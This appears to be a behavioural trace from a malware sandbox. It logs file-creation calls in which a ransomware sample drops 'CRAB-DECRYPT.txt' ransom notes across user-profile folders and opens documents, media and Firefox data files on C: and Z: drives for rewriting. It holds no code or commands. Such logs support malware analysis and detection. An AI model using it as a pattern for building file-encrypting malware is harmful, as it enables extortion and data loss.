Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Effects\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Fonts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\DR2HdhXM7A.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Bibliography Styles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Vault\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Word\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Word\STARTUP\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Extensions\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Crash Reports\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Pending Pings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\0uoW8iDiO9C0q.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\bookmarkbackups\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\crashes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\crashes\events\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp\WINNT_x86_64-msvc\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\minidumps\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\ctwtFUQdhyq9B0.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\wwWTiMqjx6hY7AqmcQRC.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\pluginreg.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\prefs.js desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\321b9820-ddf0-4472-8833-27c2104c93fa desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\search.json.mozlz4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\ZluEZ8VfU.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\secmod.db desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionCheckpoints.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\previous.js desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\upgrade.js-20170814072924 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore.js desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\AeKHMJrNCDYUq.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\SiteSecurityServiceState.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata-v2 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\usc0a0c3QarsfV.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata-v2 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\Ft1MOn1CIc.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\times.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\webappsstore.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\xulstore.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\1taL0c72JXkGj.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\profiles.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\NzZfBRffU.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\QO6C.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Skype\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\roottools.conf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\sLivwNIVhI-acv9KYt.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\EmullYJgNTq8y.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\sOc9HFGjfdRL.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\ssWXjNJMpxPjy0RSh1p_.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Sun\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Sun\Java\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Sun\Java\Deployment\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\TJzRR99g_04.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\U1cYWKMQhIFnmv.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\vJP1qxGfwRfh.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\W02IZ8W8.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\fJJNxlZPFcIOL7N8L.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\WBlnF.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\wJ1QEd.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\wspnyXL.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\wZyb.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\xVXRkU.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\hjOwYAb7YQ2odlEyn.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\ye-zc9.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\Contacts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Cookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\1bpDeojNY.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\ZcRis.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\8ANG45s-M.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\pEtobMGPdVk4C2adw.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\A 9Oefy3.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\a-lLcBqkNo0RJG2z.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\sEi0K8sZnqEl5.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\Au9hR3twSX8g2051qZl.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\oXr639hN3x86Bhd.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
